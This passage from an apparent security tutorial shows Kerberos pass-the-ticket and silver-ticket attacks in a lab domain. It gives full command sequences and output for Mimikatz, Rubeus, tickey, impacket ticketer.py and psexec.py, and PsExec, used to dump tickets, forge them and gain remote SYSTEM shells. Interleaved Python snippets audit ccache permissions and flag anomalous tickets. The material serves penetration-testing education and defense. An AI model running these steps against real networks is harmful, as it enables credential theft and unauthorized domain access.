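    """'KEYRING:session:...' gives 'KEYRING'; a bare path counts as FILE."""
    prefix, colon, _ = ccache_name.partition(":")
    return prefix.upper() if colon and prefix.isalpha() else "FILE"


def audit_file_ccaches(directory="/tmp"):
    """List krb5cc_* entries that are exposed beyond their owner."""
    findings = []
    for name in sorted(os.listdir(directory)):
        if not name.startswith("krb5cc_"):
            continue
        path = os.path.join(directory, name)
        try:
            info = os.lstat(path)
        except OSError:
            continue  # removed between listdir() and lstat()
        if not stat.S_ISREG(info.st_mode):
            findings.append((path, "not a regular file"))
            continue
        extra = stat.S_IMODE(info.st_mode) & 0o077
        if extra:
            findings.append(
                (path, "group/other permission bits set: %03o" % extra))
        uid_in_name = re.match(r"krb5cc_(\d+)", name)
        if uid_in_name and int(uid_in_name.group(1)) != info.st_uid:
            findings.append(
                (path, "owner uid differs from the uid in the file name"))
    return findings


def demo():
    """Audit a constructed directory holding three placeholder caches."""
    uid = os.getuid()
    samples = {
        "krb5cc_%d" % uid: 0o600,               # owner-only, as expected
        "krb5cc_%d_ZFxZpK" % uid: 0o644,        # readable by everyone
        "krb5cc_%d_uDoEa0" % (uid + 1): 0o600,  # name claims another uid
    }
    with tempfile.TemporaryDirectory() as tmp:
        for name, mode in samples.items():
            path = os.path.join(tmp, name)
            with open(path, "wb") as handle:
                handle.write(b"constructed placeholder, not a real ccache")
            os.chmod(path, mode)
        return [(os.path.basename(path), why)
                for path, why in audit_file_ccaches(tmp)]


if __name__ == "__main__":
    setting = ccache_setting(SAMPLE_KRB5_CONF)
    print(setting, "->", storage_type(setting))
    for name, why in demo():
        print(name, ":", why)
```

<p>A cache file whose owner does not match the uid in its name is worth a look because it is what a copied ticket file looks like on the machine it was copied to.</p>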
<p>For the other two sources (keyrings and processes), a great paper released in 2017, <a href="https://rp.os3.nl/2016-2017/p97/report.pdf" rel="nofollow">Kerberos Credential Thievery (GNU/Linux)</a>, explains ways of recovering the tickets from them.</p>
<p>Moreover, the paper also contains several scripts to extract tickets from remote machines. In the case of keyrings, their script heracles.sh can be used. In the case of a process holding the tickets, a memory analysis is required to find the tickets inside.</p>
<p>Furthermore, I have developed a tool in C based on the heracles.sh script called <a href="https://github.com/TarlogicSecurity/tickey" rel="nofollow">tickey</a>, to extract tickets from keyrings. The tool was created because the command keyctl, heavily used by heracles.sh, is not installed by default in Linux systems, so a direct call to the keyctl syscall can solve this problem.</p>
<p>Moreover, tickets in session or user keyrings can only be accessed by the owner user in the same session. Therefore, when tickey is executed as root, it searches for other users&#8217; sessions and injects itself into each one of them in order to retrieve those tickets.</p>
<p>An example of tickey output is shown below:</p>
<pre><code class="language-shell">[root@Lab-LSV01 /]# /tmp/tickey -i
[*] krb5 ccache_name = KEYRING:session:sess_%{uid}
[+] root detected, so... DUMP ALL THE TICKETS!!
[*] Trying to inject in trex[1120601113] session...
[+] Successful injection at process 21866 of trex[1120601113],look for tickets in /tmp/__krb_1120601113.ccache
[*] Trying to inject in velociraptor[1120601115] session...
[+] Successful injection at process 20752 of velociraptor[1120601115],look for tickets in /tmp/__krb_1120601115.ccache
[X] [uid:0] Error retrieving tickets
[root@Lab-LSV01 /]# klist  /tmp/__krb_1120601113.ccache
Ticket cache: FILE:/tmp/__krb_1120601113.ccache
Default principal: trex@JURASSIC.PARK

Valid starting       Expires              Service principal
05/09/2019 15:48:36  05/10/2019 01:48:36  krbtgt/JURASSIC.PARK@JURASSIC.PARK
        renew until 05/10/2019 15:48:32
</code></pre>
<h4>Harvesting tickets from Windows</h4>
<p>In Windows, tickets are handled and stored by the lsass (Local Security Authority Subsystem Service) process, which is responsible for security. Hence, to retrieve tickets from a Windows system, it is necessary to communicate with lsass and ask for them. A non-administrative user can only fetch their own tickets; a machine administrator, however, can harvest all of them. For this purpose, the tools Mimikatz or Rubeus can be used as shown below:</p>
<p>Mimikatz harvesting:</p>
<pre><code class="language-shell">PS C:\Users\velociraptor&gt; .\mimikatz.exe

  .#####.   mimikatz 2.1.1 (x64) built on Mar 18 2018 00:21:25
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       &gt; https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        &gt; https://pingcastle.com / https://mysmartlogon.com   ***/

mimikatz # sekurlsa::tickets /export

...
&lt;-----Mimikatz Output-----&gt;
...

Authentication Id : 0 ; 42211838 (00000000:028419fe)
Session           : RemoteInteractive from 2
User Name         : trex
Domain            : JURASSIC
Logon Server      : LAB-WDC01
Logon Time        : 28/02/2019 12:14:43
SID               : S-1-5-21-1339291983-1349129144-367733775-1113

         * Username : trex
         * Domain   : JURASSIC.PARK
         * Password : (null)

        Group 0 - Ticket Granting Service
         [00000000]
           Start/End/MaxRenew: 05/03/2019 9:48:37 ; 05/03/2019 19:15:59 ; 07/03/2019 12:14:43
           Service Name (02) : LDAP ; Lab-WDC02.jurassic.park ; jurassic.park ; @ JURASSIC.PARK
           Target Name  (02) : LDAP ; Lab-WDC02.jurassic.park ; jurassic.park ; @ JURASSIC.PARK
           Client Name  (01) : trex ; @ JURASSIC.PARK ( JURASSIC.PARK )
           Flags 40a50000    : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
           Session Key       : 0x00000012 - aes256_hmac
             bd16db915bdfb0af3d57509bdea3d92bf8f0ef9976a16ebb6510111597c6d8b6
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 4        [...]
           * Saved to file [0;28419fe]-0-0-40a50000-trex@LDAP-Lab-WDC02.jurassic.park.kirbi !

        Group 1 - Client Ticket ?

        Group 2 - Ticket Granting Ticket
         [00000000]
           Start/End/MaxRenew: 28/02/2019 12:14:43 ; 28/02/2019 22:14:43 ; 07/03/2019 12:14:43
           Service Name (02) : krbtgt ; JURASSIC.PARK ; @ JURASSIC.PARK
           Target Name  (--) : @ JURASSIC.PARK
           Client Name  (01) : trex ; @ JURASSIC.PARK ( $$Delegation Ticket$$ )
           Flags 60a00000    : pre_authent ; renewable ; forwarded ; forwardable ;
           Session Key       : 0x00000012 - aes256_hmac
             21666ffd3511fb2d1e127ad96e322c3a6e8be644eabba4821ba5c425b4a58842
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;28419fe]-2-0-60a00000-trex@krbtgt-JURASSIC.PARK.kirbi !
         [00000001]
           Start/End/MaxRenew: 05/03/2019 9:15:59 ; 05/03/2019 19:15:59 ; 07/03/2019 12:14:43
           Service Name (02) : krbtgt ; JURASSIC.PARK ; @ JURASSIC.PARK
           Target Name  (02) : krbtgt ; JURASSIC.PARK ; @ JURASSIC.PARK
           Client Name  (01) : trex ; @ JURASSIC.PARK ( JURASSIC.PARK )
           Flags 40e00000    : pre_authent ; initial ; renewable ; forwardable ;
           Session Key       : 0x00000012 - aes256_hmac
             f79644af74ade15f4178e5cea3b0ce071b601f78ef4b11c09ed971142dd3bb50
           Ticket            : 0x00000012 - aes256_hmac       ; kvno = 2        [...]
           * Saved to file [0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi !

...
&lt;-----Mimikatz Output-----&gt;
...
           
mimikatz # exit
Bye!
</code></pre>
<p>Rubeus harvesting in PowerShell:</p>
<pre><code class="language-shell">PS C:\Users\Administrator&gt; .\Rubeus dump

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.4.2



[*] Action: Dump Kerberos Ticket Data (All Users)


  UserName                 : Administrator
  Domain                   : JURASSIC
  LogonId                  : 0xdee0cb2
  UserSID                  : S-1-5-21-1339291983-1349129144-367733775-500
  AuthenticationPackage    : Kerberos
  LogonType                : RemoteInteractive
  LogonTime                : 07/03/2019 12:35:47
  LogonServer              : LAB-WDC01
  LogonServerDNSDomain     : JURASSIC.PARK
  UserPrincipalName        : Administrator@jurassic.park

...
&lt;-----Rubeus Output-----&gt;
...

    ServiceName              : krbtgt/JURASSIC.PARK
    TargetName               : krbtgt/jurassic.park
    ClientName               : trex
    DomainName               : JURASSIC.PARK
    TargetDomainName         : JURASSIC.PARK
    AltTargetDomainName      : JURASSIC.PARK
    SessionKeyType           : aes256_cts_hmac_sha1
    Base64SessionKey         : 1gokewLDdgqAnN3a1KNR15q3GaZM3duydjLfb037KLs=
    KeyExpirationTime        : 01/01/1601 1:00:00
    TicketFlags              : pre_authent, initial, renewable, forwardable
    StartTime                : 07/03/2019 16:28:23
    EndTime                  : 08/03/2019 2:28:23
    RenewUntil               : 14/03/2019 16:28:23
    TimeSkew                 : 0
    EncodedTicketSize        : 1284
    Base64EncodedTicket      :

      doIFADCCBPygAwIBBaEDAgEWooIEBjCCBAJhggP+MIID+qADAgEFoQ8bDUpVUkFTU0lDLlBBUkuiIjAgoAMCAQKhGTAXGwZrcmJ0
      Z3QbDUpVUkFTU0lDLlBBUkujggO8MIIDuKADAgESoQMCAQKiggOqBIIDpp9Nm0OTu82mrTl0Tekr8KEF3eX23qxHKcryCuzDV/Pd
      wUNpSc+1Oxa0k2WWvZwa+H9DW4I8fr0BE7oHMs6GaNFEjDJdO/l0qGUlCwyha05+9lg832SDEERgAA1wQDLjPogyBBTrP5OhGmf0
      JevqulePfTUSxXJ/gNvP6JCQGAf+zUL12dqGkqyq//TOWSQjkgAy3NZtc1Ed3XnfI9L4VUo9YdY5fVSEci7kRm6Mk11sTV7bXSzd
      4123fXLA3Usx+xJVKh5JPhvtSyDKRDNdcP2YKPoTyEuKUpsl8KhzbkEpdLPqzR+2uLHNmMzWDdsxTlytzZF9kzB9llUB2C9YLgzD
      Qkrx4/EIDH9w3u3pVVgAmZp1Y9sQhVmI9exIYVSPM/XA8vPAL1KDGyux+ojkVDAl/Kezqg6DWtLZO86Rpb7L7LRvk8jX/4Y4Yi0T
      MlsZjahwXn1N3ZulUiF7pvYzh9es9MkS/X/YqF6CiDogblLEaFniMYWNYFYMmhjfIZHgX3lyIj8UljRwdeFdt7Ezf/pmP1rl5uON
      hMlagv+prw4UcvN2u4Yeb+ybXMisMH4xonJIBr7/MKEhmbHVmKuoT+LBMjfN7iChY82rPqbKW0J+nn4yvC3zjLlOC5HNSTdMgGV5
      FSAY34RO3SCOe14jetHmq9OQ5rLO5ymWfet5jcYy+ShtrYoNTxEPodNZyFqrBDT4JZ6T9jgoYMIu+g3VcoCRN5XDUJM+tBzZ6QUu
      91D0ULl3wdvbEhh89hPAy1AHEWLtAth55/CJ0kNpWLPvLLz34OLzNg8nzCG2x9mFVP4MKvUw4JJN3LSkYRrxIg5eehSuQul43ZqQ
      hxi/+OyRoVwSfqqMeYO2QSeADaIiaFTwWaIDAu0pr1Vk+XfJGuHUWBjRocHu3dasPMhGoRlV5ehHxc58gnJ6UzkfcVDV7j1Skn7e
      os6wa6ejFOrMKNSB+cBqBcvBMCCksHsnQSd4gxUiw/7Masc9M+f9Xi3vf+f0LyiSKDdUIDOekMh/RqQhGs9UKSjp6/Q7EhMCd90J
      UDGbwBQZhTOBZApdo1VQ609kXfv654RSZ1OzSgaaK6P0GJdJGJ5NGIuNl1n0oEOZVB0FfATLH/xC9uD97VkH2mQ8jnFHHxseUle2
      qMhkG+NsLOD7c2c9pzUNEbc4EZEjwMFx4eJwEeLnpXOMOMS6ix1YMuZjof6Q8xNmq05vpNMAOScgV7d3QmMvJLNy6LB6gBKPPBqG
      4kCjgeUwgeKgAwIBAKKB2gSB132B1DCB0aCBzjCByzCByKArMCmgAwIBEqEiBCDWCiR7AsN2CoCc3drUo1HXmrcZpkzd27J2Mt9v
      Tfsou6EPGw1KVVJBU1NJQy5QQVJLohEwD6ADAgEBoQgwBhsEdHJleKMHAwUAQOAAAKURGA8yMDE5MDMwNzE1MjgyM1qmERgPMjAx
      OTAzMDgwMTI4MjNapxEYDzIwMTkwMzE0MTUyODIzWqgPGw1KVVJBU1NJQy5QQVJLqSIwIKADAgECoRkwFxsGa3JidGd0Gw1KVVJB
      U1NJQy5QQVJL


...
&lt;-----Rubeus Output-----&gt;
...

[*] Enumerated 23 total tickets
[*] Extracted  23 total tickets

PS C:\Users\Administrator&gt; [IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("&lt;Base64EncodedTicket value&gt;"))
</code></pre>
<p>Finally, after executing either of those tools, the tickets are dumped and ready to use, except for those that have expired.</p>
<h4>Swapping Linux and Windows tickets between platforms</h4>
<p>Before using the tickets, it is important to have them in the proper format, because Windows and Linux store them differently. To convert from ccache (Linux file format) to kirbi (Windows file format used by Mimikatz and Rubeus), and vice versa, the following tools can be used:</p>
<ul>
<li>The <a href="https://github.com/Zer1t0/ticket_converter" rel="nofollow">ticket_converter</a> script. The only parameters needed are the current ticket and the output file; it automatically detects the input ticket file format and converts it. For example:</li>
</ul>
<pre><code class="language-shell">root@kali:ticket_converter# python ticket_converter.py velociraptor.ccache velociraptor.kirbi
Converting ccache =&gt; kirbi
root@kali:ticket_converter# python ticket_converter.py velociraptor.kirbi velociraptor.ccache
Converting kirbi =&gt; ccache
</code></pre>
<ul>
<li><a href="https://github.com/gentilkiwi/kekeo" rel="nofollow">Kekeo</a>, to convert them in Windows. This tool was not checked because its ASN1 library requires a license, but I think it is worth mentioning.</li>
</ul>
<h4>From Linux</h4>
<p>To perform the pass the ticket attack by using psexec.py from impacket, just do the following:</p>
<pre><code class="language-shell">root@kali:impacket-examples# export KRB5CCNAME=/root/impacket-examples/krb5cc_1120601113_ZFxZpK
root@kali:impacket-examples# python psexec.py jurassic.park/trex@labwws02.jurassic.park -k -no-pass
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation

[*] Requesting shares on labwws02.jurassic.park.....
[*] Found writable share ADMIN$
[*] Uploading file SptvdLDZ.exe
[*] Opening SVCManager on labwws02.jurassic.park.....
[*] Creating service zkNG on labwws02.jurassic.park.....
[*] Starting service zkNG.....
[!] Press help for extra shell commands
Microsoft Windows [Versión 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32&gt;whoami
nt authority\system

C:\Windows\system32&gt;

</code></pre>
<p>As with PTK attacks, in order to use a ticket with any impacket tool, just specify the KRB5CCNAME environment variable and the <em>-no-pass -k</em> parameters.</p>
<p>While performing this technique, impacket showed an error, <em>[-] SMB SessionError: STATUS_ACCESS_DENIED&#8230;</em>, even though the user had access to the remote machine. The cause was that the ticket used lacked the A flag (pre-authenticated), because that domain user did not need Kerberos pre-authentication. To check ticket flags in Linux, the command <em>klist -f</em>, which is part of the krb5 package, can be used. Example:</p>
<pre><code class="language-shell">root@kali:impacket-examples# klist -f -c krb5cc_1120601113_ZFxZpK
Ticket cache: FILE:krb5cc_1120601113_ZFxZpK
Default principal: velociraptor@JURASSIC.PARK

Valid starting     Expires            Service principal
03/07/19 11:08:45  03/07/19 21:08:45  krbtgt/JURASSIC.PARK@JURASSIC.PARK
	renew until 03/08/19 11:08:41, Flags: RIA
</code></pre>
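<p>The letters printed by <em>klist -f</em> and the hexadecimal flag values printed by the Windows tools are the same RFC 4120 bit field. The following added example (not code from the original article) converts between the two and reports tickets that lack the pre-authentication flag; the first ticket in the sample listing mirrors the output above, the second one and the principal name are constructed, and all function names are assumptions.</p>

```python
import re

# (RFC 4120 bit number, letter printed by MIT "klist -f", flag name).
# Bit 0 is the most significant bit of the 32-bit field. Rows follow the
# order in which klist prints its letters; bit 15 has no klist letter.
TICKET_FLAGS = [
    (1, "F", "forwardable"), (2, "f", "forwarded"),
    (3, "P", "proxiable"), (4, "p", "proxy"),
    (5, "D", "may_postdate"), (6, "d", "postdated"),
    (7, "i", "invalid"), (8, "R", "renewable"),
    (9, "I", "initial"), (11, "H", "hw_authent"),
    (10, "A", "pre_authent"), (12, "T", "transited_policy_checked"),
    (13, "O", "ok_as_delegate"), (15, None, "name_canonicalize"),
    (16, "a", "anonymous"),
]


def flag_mask(bit):
    """Mask of an RFC 4120 flag bit inside the 32-bit value."""
    return 1 << (31 - bit)


PRE_AUTHENT = flag_mask(10)


def flag_names(value):
    """Names of the flags set in a value such as 0x40e00000."""
    return [name for bit, _, name in TICKET_FLAGS if value & flag_mask(bit)]


def klist_letters(value):
    """Letters klist -f would print for the same value."""
    return "".join(letter for bit, letter, _ in TICKET_FLAGS
                   if letter and value & flag_mask(bit))


def letters_to_value(letters):
    """Turn a klist -f string such as 'RIA' into the numeric flags."""
    by_letter = {letter: bit for bit, letter, _ in TICKET_FLAGS if letter}
    value = 0
    for letter in letters:
        if letter not in by_letter:
            raise ValueError("unknown klist flag letter: %r" % letter)
        value |= flag_mask(by_letter[letter])
    return value


# One ticket line: start date and time, end date and time, service principal.
ENTRY = re.compile(r"^\d{2}/\d{2}/\d{2,4}\s+\d{2}:\d{2}:\d{2}\s+"
                   r"\d{2}/\d{2}/\d{2,4}\s+\d{2}:\d{2}:\d{2}\s+(\S+)")
FLAGS_LINE = re.compile(r"Flags:\s*(\w+)")


def parse_klist_f(text):
    """Return [{'service': ..., 'flags': int}, ...] from klist -f output."""
    tickets = []
    for line in text.splitlines():
        entry = ENTRY.match(line.strip())
        if entry:
            tickets.append({"service": entry.group(1), "flags": 0})
            continue
        found = FLAGS_LINE.search(line)
        if found and tickets:
            tickets[-1]["flags"] = letters_to_value(found.group(1))
    return tickets


def without_preauth(tickets):
    """Service principals of tickets whose A (pre_authent) flag is not set."""
    return [t["service"] for t in tickets if not t["flags"] & PRE_AUTHENT]


# Constructed listing: first ticket as in the article, second one made up.
SAMPLE_KLIST = """\
Ticket cache: FILE:krb5cc_1120601113_ZFxZpK
Default principal: trex@JURASSIC.PARK

Valid starting     Expires            Service principal
03/07/19 11:08:45  03/07/19 21:08:45  krbtgt/JURASSIC.PARK@JURASSIC.PARK
\trenew until 03/08/19 11:08:41, Flags: RIA
03/07/19 11:20:02  03/07/19 21:08:45  cifs/labwws02.jurassic.park@JURASSIC.PARK
\tFlags: FR
"""

if __name__ == "__main__":
    for value in (0x40e00000, 0x60a00000, 0x40a50000):
        print(hex(value), klist_letters(value), flag_names(value))
    print("no pre-auth:", without_preauth(parse_klist_f(SAMPLE_KLIST)))
```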
<h4>From Windows</h4>
<p>On a Windows machine, Rubeus or Mimikatz can be used to inject tickets into the current session; no special privileges are required for this task. After that, it is possible to use a tool like PsExec to execute commands in remote machines as the new user. Example executions of both tools are shown below:</p>
<p>Mimikatz example:</p>
<pre><code class="language-shell">PS C:\Users\velociraptor&gt; .\mimikatz.exe

  .#####.   mimikatz 2.1.1 (x64) built on Mar 18 2018 00:21:25
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       &gt; https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        &gt; https://pingcastle.com / https://mysmartlogon.com   ***/

mimikatz # kerberos::ptt [0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi

* File: '[0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi': OK

mimikatz # exit
Bye!
PS C:\Users\velociraptor&gt; klist

Current LogonId is 0:0x34f9571

Cached Tickets: (1)

#0&gt;     Client: trex @ JURASSIC.PARK
        Server: krbtgt/JURASSIC.PARK @ JURASSIC.PARK
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e00000 -&gt; forwardable renewable initial pre_authent
        Start Time: 3/5/2019 9:15:59 (local)
        End Time:   3/5/2019 19:15:59 (local)
        Renew Time: 3/7/2019 12:14:43 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96

PS C:\Users\velociraptor&gt; .\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd

PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com


Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32&gt;whoami
jurassic\trex

C:\Windows\system32&gt;
</code></pre>
<p>Rubeus example:</p>
<pre><code class="language-shell">C:\Users\velociraptor&gt;.\Rubeus.exe ptt /ticket:[0;28419fe]-2-1-40e00000-trex@krbtgt-JURASSIC.PARK.kirbi

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.3.3


[*] Action: Import Ticket
[+] Ticket successfully imported!

C:\Users\velociraptor&gt;klist

Current LogonId is 0:0x34f958e

Cached Tickets: (1)

#0&gt;     Client: trex @ JURASSIC.PARK
        Server: krbtgt/JURASSIC.PARK @ JURASSIC.PARK
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40e00000 -&gt; forwardable renewable initial pre_authent
        Start Time: 3/5/2019 9:15:59 (local)
        End Time:   3/5/2019 19:15:59 (local)
        Renew Time: 3/7/2019 12:14:43 (local)
        Session Key Type: AES-256-CTS-HMAC-SHA1-96


C:\Users\velociraptor&gt;.\PsExec.exe -accepteula \\lab-wdc01.jurassic.park cmd

PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com


Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32&gt;whoami
jurassic\trex

C:\Windows\system32&gt;
</code></pre>
<p>After injecting the ticket of a user account, it is possible to act on behalf of that user in remote machines, but not in the local one, where Kerberos doesn&#8217;t apply. Remember that TGT tickets are more useful than TGS ones, as they are not restricted to one service only.</p>
<h3>Silver ticket</h3>
<p>The Silver ticket attack is based on crafting a valid TGS for a service once the NTLM hash of a user account is owned. Thus, it is possible to gain access to that service by forging a custom TGS with the maximum privileges inside it.</p>
<p>In this case, the NTLM hash of a computer account (which is kind of a user account in AD) is owned. Hence, it is possible to craft a ticket in order to get into that machine with administrator privileges through the SMB service.</p>
<p>It must also be taken into account that tickets can be forged using the AES Kerberos keys (AES128 and AES256), which are calculated from the password as well and can be used by Impacket and Mimikatz to craft the tickets. Moreover, these keys, unlike the NTLM hash, are salted with the domain and username. To learn more about how these keys are calculated, it is recommended to read <a href="https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-kile/936a4878-9462-4753-aac8-087cd3ca4625" rel="nofollow">section 4.4 of MS-KILE</a> or the <a href="https://gist.github.com/Kevin-Robertson/9e0f8bfdbf4c1e694e6ff4197f0a4372" rel="nofollow">Get-KerberosAESKey.ps1</a> script.</p>
<h4>From Linux</h4>
<p>As usual, it is possible to perform these attacks from a Linux machine by using the examples provided by impacket. In this case ticketer.py is used to forge a TGS:</p>
<pre><code class="language-shell">root@kali:impacket-examples# python ticketer.py -nthash b18b4b218eccad1c223306ea1916885f -domain-sid S-1-5-21-1339291983-1349129144-367733775 -domain jurassic.park -spn cifs/labwws02.jurassic.park  stegosaurus
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for jurassic.park/stegosaurus
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	PAC_SERVER_CHECKSUM
[*] 	PAC_PRIVSVR_CHECKSUM
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving ticket in stegosaurus.ccache
root@kali:impacket-examples# export KRB5CCNAME=/root/impacket-examples/stegosaurus.ccache
root@kali:impacket-examples# python psexec.py jurassic.park/stegosaurus@labwws02.jurassic.park -k -no-pass
Impacket v0.9.18 - Copyright 2018 SecureAuth Corporation

[*] Requesting shares on labwws02.jurassic.park.....
[*] Found writable share ADMIN$
[*] Uploading file JhRQHMnu.exe
[*] Opening SVCManager on labwws02.jurassic.park.....
[*] Creating service Drvl on labwws02.jurassic.park.....
[*] Starting service Drvl.....
[!] Press help for extra shell commands
Microsoft Windows [Versión 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32&gt;whoami
nt authority\system

C:\Windows\system32&gt;
</code></pre>
<p>Execution is similar to PTT attacks, but in this case the ticket is created manually. After that, as usual, it is possible to set the ticket in the KRB5CCNAME environment variable and use it with the <em>-no-pass -k</em> parameters in any of the impacket examples.</p>
<h4>From Windows</h4>
<p>In Windows, <a href="https://github.com/gentilkiwi/mimikatz" rel="nofollow">Mimikatz</a> can be used to craft the ticket. Next, the ticket is injected with Rubeus, and finally a remote shell can be obtained thanks to PsExec. Note that tickets can be forged on a local machine that is not in the target network and then sent to a machine in the network to be injected. An execution example is shown below:</p>
<pre><code class="language-shell">C:\Users\triceratops&gt;.\mimikatz.exe

  .#####.   mimikatz 2.1.1 (x64) built on Mar 18 2018 00:21:25
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       &gt; https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        &gt; https://pingcastle.com / https://mysmartlogon.com   ***/

mimikatz # kerberos::golden /domain:jurassic.park /sid:S-1-5-21-1339291983-1349129144-367733775 /rc4:b18b4b218eccad1c223306ea1916885f /user:stegosaurus /service:cifs /target:labwws02.jurassic.park
User      : stegosaurus
Domain    : jurassic.park (JURASSIC)
SID       : S-1-5-21-1339291983-1349129144-367733775
User Id   : 500
Groups Id : *513 512 520 518 519
ServiceKey: b18b4b218eccad1c223306ea1916885f - rc4_hmac_nt
Service   : cifs
Target    : labwws02.jurassic.park
Lifetime  : 28/02/2019 13:42:05 ; 25/02/2029 13:42:05 ; 25/02/2029 13:42:05
-&gt; Ticket : ticket.kirbi

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !

mimikatz # exit
Bye!
C:\Users\triceratops&gt;.\Rubeus.exe ptt /ticket:ticket.kirbi

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v1.3.3


[*] Action: Import Ticket
[+] Ticket successfully imported!

C:\Users\triceratops&gt;.\PsExec.exe -accepteula \\labwws02.jurassic.park cmd

PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com


Microsoft Windows [Versión 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\system32&gt;whoami
jurassic\stegosaurus

C:\Windows\system32&gt;
</code></pre>
<p>Additionally, the Mimikatz module <em>kerberos::ptt</em> can be used to inject the ticket instead of using Rubeus, as shown in the PTT attack section.</p>
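<p>The forged ticket above carries a lifetime of roughly ten years, while the tickets issued by the KDC earlier in this article last 10 hours and are renewable for 7 days. The following added example (not code from the original article) applies that comparison to ticket listing lines; the sample lines are constructed from values shown in this article, the two limits are assumed policy values passed as parameters, and the function names are hypothetical.</p>

```python
import re
from datetime import datetime, timedelta

# Matches the "Start/End/MaxRenew" and "Lifetime" lines shown in the article.
LIFETIME = re.compile(
    r"(?:Start/End/MaxRenew|Lifetime)\s*:\s*([^;]+);([^;]+);\s*(.+?)\s*$")

# Day-first dates, as printed on the article's lab hosts (assumption: the
# listing being checked uses the same locale).
DATE_FORMAT = "%d/%m/%Y %H:%M:%S"


def parse_times(line):
    """Return (start, end, renew_until) or None if the line is not a match."""
    found = LIFETIME.search(line)
    if not found:
        return None
    try:
        return tuple(datetime.strptime(part.strip(), DATE_FORMAT)
                     for part in found.groups())
    except ValueError:
        return None  # dates in another format are skipped, not guessed


def lifetime_findings(listing,
                      max_life=timedelta(hours=10),
                      max_renew=timedelta(days=7)):
    """Return (line number, lifetime, reasons) for tickets beyond the limits.

    max_life and max_renew are assumed policy values; pass the limits that
    are actually configured in the domain being checked.
    """
    findings = []
    for number, line in enumerate(listing.splitlines(), 1):
        times = parse_times(line)
        if times is None:
            continue
        start, end, renew = times
        reasons = []
        if end - start > max_life:
            reasons.append("lifetime")
        if renew - start > max_renew:
            reasons.append("renewal")
        if reasons:
            findings.append((number, end - start, reasons))
    return findings


# Constructed listing: two KDC-issued tickets and the forged one, using the
# timestamps printed in the article.
SAMPLE_LISTING = """\
Start/End/MaxRenew: 28/02/2019 12:14:43 ; 28/02/2019 22:14:43 ; 07/03/2019 12:14:43
Start/End/MaxRenew: 05/03/2019 9:48:37 ; 05/03/2019 19:15:59 ; 07/03/2019 12:14:43
Lifetime  : 28/02/2019 13:42:05 ; 25/02/2029 13:42:05 ; 25/02/2029 13:42:05
"""

if __name__ == "__main__":
    for number, lifetime, reasons in lifetime_findings(SAMPLE_LISTING):
        print("line %d: lifetime of %d days exceeds policy (%s)"
              % (number, lifetime.days, ", ".join(reasons)))
```

<p>A forged ticket can also be given a policy-compliant lifetime, so a clean result from this check proves nothing; it only catches tickets that keep an oversized lifetime like the one above.</p>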
<h3>Golden ticket</h3>
<p>The Golden ticket technique is similar to the Silver ticket one; however, in this case a TGT is crafted by using the NTLM hash of the krbtgt AD account. The advantage of forging a TGT instead of a TGS is being able to access any service (or machine) in the domain.</p>
